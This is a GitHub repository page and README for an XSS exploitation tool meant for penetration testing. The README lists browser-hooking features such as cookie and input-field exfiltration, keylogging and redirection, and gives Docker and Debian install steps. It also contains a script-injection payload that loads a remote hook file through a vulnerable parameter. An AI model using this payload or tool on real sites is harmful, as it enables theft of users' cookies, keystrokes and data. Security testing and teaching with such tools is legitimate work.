Skip to content

Sharpforce/XSS-Exploitation-Tool

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

78 Commits
commands
commands
 
 
db
db
 
 
demo
demo
 
 
fonts
fonts
 
 
images
images
 
 
inc
inc
 
 
scripts
scripts
 
 
styles
styles
 
 
.dockerignore
.dockerignore
 
 
.gitignore
.gitignore
 
 
CHANGELOG.md
CHANGELOG.md
 
 
Dockerfile
Dockerfile
 
 
Dockerfile.dev
Dockerfile.dev
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
browserDetails.php
browserDetails.php
 
 
composer.json
composer.json
 
 
composer.lock
composer.lock
 
 
docker-compose.override.yml
docker-compose.override.yml
 
 
docker-compose.yml
docker-compose.yml
 
 
geolocationBrowserCard.php
geolocationBrowserCard.php
 
 
historyBrowserCard.php
historyBrowserCard.php
 
 
hook.js
hook.js
 
 
hookedScreenshotCard.php
hookedScreenshotCard.php
 
 
index.php
index.php
 
 
map.php
map.php
 
 
rcv.php
rcv.php
 
 
reset_database.php
reset_database.php
 
 
settings.php
settings.php
 
 
sourceCodeCard.php
sourceCodeCard.php
 
 
summaryBrowserCard.php
summaryBrowserCard.php
 
 
summaryBrowsersCard.php
summaryBrowsersCard.php
 
 
technicalDetailsBrowserCard.php
technicalDetailsBrowserCard.php
 
 

Repository files navigation

XSS Exploitation Tool

XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.

Features

  • Technical Data about victim browser
  • Geolocation of the victim
  • Snapshot of the hooked/visited page
  • Source code of the hooked/visited page
  • Exfiltrate input field data
  • Exfiltrate cookies
  • Keylogging
  • Display alert box
  • Redirect user

Installation

Using Docker

Build the image:

$ docker-compose -f docker-compose.yml build

This will spin up the server and the database, visit the page http://localhost:8000 to see the XSS Exploitation Tool interface.

On host

Tested on Debian 12

Get the sources

Install Git and pull the XSS-Exploitation-Tool source code:

$ sudo apt-get install git

$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/

Install the extensions

You may need Apache, Mysql database and PHP with modules:

$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html

Install composer, then install the application dependencies:

$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/

Init the database

$ sudo mysql

Creating a new user with specific rights:

MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)

MariaDB [(none)]> quit
Bye

Creating the database (will result in an empty page): visit the page http://localhost:8000/reset_database.php

Visit the page http://localhost:8000 to see the XSS Exploitation Tool interface.

How it works

Access the file exploit.html: http://localhost:8000/demo/ or exploit a Cross-Site Scripting vulnerability to insert the Javascript hook file:

?vulnerable_param=<script src="http://localhost:8000/hook.js"/>

Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers.

Demo

Disclaimer

This tool is intended for educational purposes only and should be used exclusively in authorized penetration testing environments. Unauthorized access to or use of systems that you do not own is illegal. The author is not responsible for any misuse of this tool.

License

This project is licensed under the GPL-3.0.

About

An XSS Exploitation Tool

sharpforce.gitbook.io/cybersecurity/mes-projets/xss-exploitation-tool

Topics

xss xss-attacks cross-site-scripting

Resources

Readme

License

GPL-3.0 license
Activity

Stars

278 stars

Watchers

7 watching

Forks

52 forks
Report repository

Releases 2

v0.6.0 Latest
Dec 6, 2024
+ 1 release

Languages